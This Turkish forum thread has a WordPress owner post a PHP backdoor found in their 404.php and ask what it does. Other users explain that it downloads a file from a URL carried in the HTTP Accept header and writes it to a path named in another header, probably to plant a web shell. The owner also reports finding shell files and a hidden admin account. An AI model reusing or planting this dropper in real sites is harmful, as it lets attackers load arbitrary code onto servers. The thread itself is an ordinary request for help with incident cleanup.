DH Anasayfa
İndirim Kodu
Ara
Popüler
Foruma Git
Hakkımızda
Destek
Mobil Sürüm
Standart Site Görünümü
Bu Konuda
  • Tüm Forumlar
  • Web Tasarım - Programlama
  • Yazılım Geliştirme
  • PHP / CGI
  • Bu Konuda
Arama butonu
Bağlan:
Facebook
Google+
Twitter
Aşağı Git Tüm Forumlar Web Tasarım - Programlama Yazılım Geliştirme PHP / CGI Wordpress 404.php de bu kodu buldum Hacklendim galiba
Bu konudaki kullanıcılar: 1 misafir
4
Cevap 877
Tıklama 0
Öne Çıkarma
Wordpress 404.php de bu kodu buldum Hacklendim galiba
Cevap Yaz
Konuya Özel
B
byyigit
10 yıl
Yüzbaşı
Konu Sahibi

Merhaba,

wordpress blogumun 404.php sinin en altında

quote:

<?php

$ur = $_SERVER['HTTP_ACCEPT'];

$f = $_SERVER['HTTP_ACCEPT_LANGUAGE'];

if (preg_match('/http/i', $ur)) {

$ch = curl_init($ur);

$fp = fopen($f, "w");

curl_setopt($ch, CURLOPT_FILE, $fp);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch); curl_close($ch);fclose($fp);

}

?>


bu konu buldum. Nedir bu acaba ? Ne işlev yapar ?

DH forumlarında vakit geçirmekten keyif alıyor gibisin ancak giriş yapmadığını görüyoruz.

Üye olduğunda özel mesaj gönderebilir, beğendiğin konuları favorilerine ekleyip takibe alabilir ve daha önce gezdiğin konulara hızlıca erişebilirsin.

Üye Ol Şimdi Değil
Bir Daha Gösterme



O
overpSkpt
10 yıl
Teğmen

HTTP_ACCEPT içerinde http ile başlayan bir şey varsa onu alıp dizine kaydediyor. Büyük ihtimalle shell yüklemek içindir.



B
byyigit
10 yıl
Yüzbaşı
Konu Sahibi

üstad dizinde 2 tane shell dosyası buldum ve mysql user table da admin yetkileri verilmiş kullanıcı buldum (panelde gözükmüyordu). bunları temizledim. acaba bu http_accept dedigin şey nedir. Bu dizine yollanan dosyalar nerden geliyor serverda biryerde gizlimidir ?


Bu mesaja 1 cevap geldi.

Bu mesajda bahsedilenler: @overpSkpt
O
overpSkpt
10 yıl
Teğmen

$fp = fopen($f, "w"); bunla bir dosyası sana yazdırıyor içinde de başka çekmek istediği dosyalar vardır büyük ihtimal ya da direkt shell atıp onun üzerinden ilerleyebilir.
daha sonra CURL ile de yüklemek istediği dosya işlemine başlıyor.

CURL genelde dosya indirme işlemlerinde ya da bir sayfayı çağırma işlemlerinde kullanılır.


Bu mesaja 1 cevap geldi.
A
ahmtbrk58
10 yıl
Yüzbaşı

curl_init yaptığı url önemli aslında ona baksana $ur variablesine



Cevap Yaz
Tüm Forumlar Web Tasarım - Programlama Yazılım Geliştirme PHP / CGI Wordpress 404.php de bu kodu buldum Hacklendim galiba
DH Mobil uygulaması ile devam edin. Mobil tarayıcınız ile mümkün olanların yanı sıra, birçok yeni ve faydalı özelliğe erişin.
App Store'danİndirin Google Play'denİndirin
Gizle ve güncelleme çıkana kadar tekrar gösterme.
DonanımHaber Forum - Mini Sürüm

Hakkımızda | Yukarı

Tam sürüm için tıklayınız
Version: 1.2.871
Donanım Sponsoru: incehesap.com